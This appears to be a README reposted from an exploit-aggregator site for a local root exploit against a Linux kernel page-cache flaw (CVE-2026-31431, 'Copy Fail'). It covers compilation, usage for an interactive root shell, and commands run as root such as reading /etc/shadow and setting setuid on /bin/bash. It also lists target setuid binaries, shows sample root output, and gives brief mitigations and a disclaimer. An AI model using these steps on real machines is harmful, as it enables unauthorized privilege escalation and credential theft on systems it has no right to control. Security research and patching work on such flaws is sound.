Share
## https://sploitus.com/exploit?id=3A42E818-93C4-5256-922A-182699A8CA14
# CVE-2026-31431 Copy Fail Exploit

A Linux kernel page cache contamination vulnerability exploit tool, supporting non-interactive command execution. ## Vulnerability Overview

CVE-2026-31431 is a logical flaw in the Linux kernel, present in the implementation of the `authencesn` AEAD algorithm. Through the `AF_ALG` and `splice()` system call chains, an attacker can write 4-byte data into the page cache of any readable file. **Impact Scope:**
- Linux kernel 4.14+ (2017 โ€“ April 2026)
- Almost all mainstream distributions: Ubuntu, Debian, CentOS, RHEL, Amazon Linux, etc.

**Vulnerability Characteristics:**
- 100% reliable, no race conditions required
- No need for kernel offset calculations
- The same binary file works on all distributions
- Does not modify disk files, only contaminates memory cache

## File Description

```
. โ”œโ”€โ”€ copyfail_universal.c    # Main POC source code (statically compiled, no libc dependencies)
โ”œโ”€โ”€ copyfail_universal      # Compiled binary file
โ”œโ”€โ”€ run_cmd.sh              # Non-interactive wrapper script
โ”œโ”€โ”€ Makefile                # Compilation script
โ””โ”€โ”€ README.md               # Documentation
```

## Compilation

```bash
# Method 1: Using gcc and ld
gcc -c copyfail_universal.c -o copyfail_universal.o -O2 -fno-stack-protector -fno-pic -fno-pie
ld copyfail_universal.o -o copyfail_universal -static -nostdlib
chmod +x copyfail_universal

# Method 2: Using Makefile
make
```

## Usage

### Interactive Root Shell

```bash
./copyfail_universal
```

### Non-interactive Command Execution

```bash
# Method 1: Using the wrapper script (Recommended)
./run_cmd.sh "id"
./run_cmd.sh "cat /etc/shadow"
./run_cmd.sh "chmod 4777 /bin/bash"

# Method 2: Through pipes
echo 'id > /tmp/pwned.txt; exit' | ./copyfail_universal

# Method 3: Using environment variables
CMD='whoami' ./copyfail_universal
```

### Specifying Other Setuid Targets

```bash
# Default target is /usr/bin/su
# Other targets can be specified by modifying the path variable in the source code

# Common available targets:
# /usr/bin/su
# /usr/bin/passwd
# /usr/bin/chsh
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/pkexec
```

## Automatic Recovery

The vulnerability only modifies the page cache; disk files are not modified. The following command can restore the situation:

```bash
sync; echo 3 > /proc/sys/vm/drop_caches
```

The `run_cmd.sh` script includes an automatic recovery feature. ## Example Output

```
$ ./run_cmd.sh "id"

[*] CVE-2026-31431 Copy Fail Exploit
[*] Target: /usr/bin/su
[*] Mode: Interactive shell
[*] Payload size: 112 bytes
[*] Contaminating page cache... [+] Done! Executing su... uid=0(root) gid=1000(user) groups=1000(user),4(adm),27(sudo)
```

## Affected Setuid Programs

| Program | Path | Availability |
|--------|------|------------|
| su     | /usr/bin/su | โœ… Default |
| passwd  | /usr/bin/passwd | โœ… |
| chsh   | /usr/bin/chsh | โœ… |
| chfn   | /usr/bin/chfn | โœ… |
| gpasswd | /usr/bin/gpasswd | โœ… |
| pkexec | /usr/bin/pkexec | โœ… |
| mount   | /bin/mount | โœ… |
| umount  | /bin/umount | โœ… |

Find all setuid programs on the system:
```bash
find / -perm -4000 -user root -type f 2>/dev/null
```

## Fix Suggestions

1. **Update the kernel** โ€“ Upgrade to a kernel version that includes the patch `a664bf3d603d`.

2. **Temporary Mitigation** โ€“ Disable the `algif_aead` module:
   ```bash
   echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
   rmmod algif_aead 2>/dev/null || true
   ```

3. **Container Environments** โ€“ Use seccomp to prevent `AF_ALG` socket creation.

## Technical Details

- **Vulnerability Type**: Page cache out-of-bounds write
- **Root Cause**: `authencesn` uses a target buffer as temporary storage, allowing 4-byte writes beyond the boundary
- **Exploitation Method**: Passes the page cache to the crypto subsystem via `splice()`
- **Write Capability**: 4 bytes can be written to the page cache of any readable file per operation

## Disclaimer

This tool is intended for security research and authorized testing purposes only. Using this tool to attack unauthorized systems is illegal. Users must bear all legal responsibilities. ## References

- [CVE-2026-31431 Write-up](https://copy.fail/)
- [Xint Blog - Copy Fail](https://xint.io/blog/copy-fail-linux-distributions)
- [GitHub - Official POC](https://github.com/theori-io/copy-fail-CVE-2026-31431)